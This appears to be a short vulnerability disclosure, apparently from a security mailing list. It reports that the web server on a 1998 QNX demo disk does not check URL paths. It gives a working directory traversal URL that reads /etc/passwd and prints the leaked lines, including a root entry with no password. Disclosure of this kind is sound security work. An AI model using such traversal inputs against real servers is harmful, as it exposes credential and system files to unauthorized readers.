Local file retrieving in QNX Internet Appliance Toolkit http-daemon
(web.server)

Vendor-URL: http://www.qnx.com

Description:
--====--

I recently found a 3,5"-disk labeled with QNX-demo on my desk. This is
the "Take the 1.44M Web Challenge!"-disk I got it in 1998. I couldn't find
the demo on the qnx-website, but i found it on another site:
http://public.planetmirror.com/pub/qnx/demodisk/ (v4.00) Anyway, the
webserver doesn't check the url's, so you can view any text-file on the
diskette.

Affected (and tested) versions:
--========--

    v1.1
    Modem v3.03
    Network v4.00
    Network v405
    Modem v405

Vulnerability:
--====--

The document-root of the webserver is /usr/httpd, so type this URL in the
embedded webbrowser:

http://127.1/../../etc/passwd

and you'll see the /etc/passwd:
root::0:0:/usr/httpd:/bin/sh
bin::1:0:/bin:


Thanks for reading, greets to all,

Michael



P.S.: This is my first vulnerability :-)